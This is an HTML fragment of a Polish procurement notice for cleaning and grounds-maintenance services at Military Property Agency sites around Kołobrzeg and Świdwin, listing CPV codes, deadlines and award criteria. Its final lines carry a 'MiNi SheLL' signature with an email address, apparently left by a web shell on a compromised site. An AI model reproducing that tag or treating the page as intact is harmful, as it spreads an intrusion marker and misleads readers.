<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI:	zadanie 1 - Kołobrzeg, zadanie 2- Kołobrzeg,  Mrzeżyno, Gryfice, 		Jaromin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Kołobrzeg
2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach:  Kołobrzeg,  Mrzeżyno, Gryfice, Jaromin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczace zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII:	zadanie 1 - Świdwin, zadanie 2 - Świdwin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Świdwin
2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: Świdwin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com